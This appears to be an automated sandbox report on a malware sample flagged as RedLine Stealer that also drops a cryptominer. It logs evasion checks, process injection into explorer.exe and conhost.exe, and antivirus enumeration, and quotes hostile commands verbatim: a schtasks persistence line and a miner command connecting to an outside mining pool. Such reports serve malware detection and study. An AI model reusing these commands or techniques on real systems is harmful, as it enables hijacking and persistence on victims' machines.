                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Query firmware table information (likely to detect VMs)Show sources
                  Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1836Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 3398Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 5671Jump to behavior
                  Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: conhost.exe, 00000011.00000003.755448964.00000201F483F000.00000004.00000001.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?
                  Source: AppLaunch.exe, 00000001.00000002.739738609.000000000A288000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                  Source: sistem.exe, 00000008.00000002.730405844.0000000000C0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeCode function: 0_2_004074B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004074B7

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\explorer.exeDomain query: mine.bmpool.org
                  Source: C:\Windows\explorer.exeNetwork Connect: 157.90.156.89 116Jump to behavior
                  Allocates memory in foreign processesShow sources
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1B0F37B0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 201F1F70000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 224D5930000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25F9A6F0000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5AJump to behavior
                  Creates a thread in another existing process (thread injection)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeThread created: C:\Windows\System32\conhost.exe EIP: F37B0000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: F1F70000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: D5930000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeThread created: C:\Windows\System32\conhost.exe EIP: 9A6F0000Jump to behavior
                  Writes to foreign memory regionsShow sources
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: D3B008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: F18008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeMemory written: C:\Windows\System32\conhost.exe base: 1B0F37B0000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 201F1F70000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 2E2010Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 224D5930000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 10FF010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 25F9A6F0000Jump to behavior
                  Injects code into the Windows Explorer (explorer.exe)Show sources
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140000000 value: 4DJump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140001000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140367000 value: 1EJump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 1404A0000 value: F0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140753000 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140775000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140776000 value: C5Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140777000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140779000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077B000 value: 60Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077C000 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077D000 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 2E2010 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140000000 value: 4DJump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140001000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140367000 value: 1EJump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 1404A0000 value: F0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140753000 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140775000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140776000 value: C5Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140777000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140779000 value: 48Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077B000 value: 60Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077C000 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077D000 value: 00Jump to behavior
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 10FF010 value: 00Jump to behavior
                  Modifies the context of a thread in another process (thread injection)Show sources
                  Source: C:\Windows\System32\conhost.exeThread register set: target process: 6924Jump to behavior
                  Source: C:\Windows\System32\conhost.exeThread register set: target process: 4876Jump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040Jump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"Jump to behavior
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\explorer.exeCode function: 27_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,27_2_000000014031010C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected RedLine StealerShow sources
                  Source: Yara matchFile source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
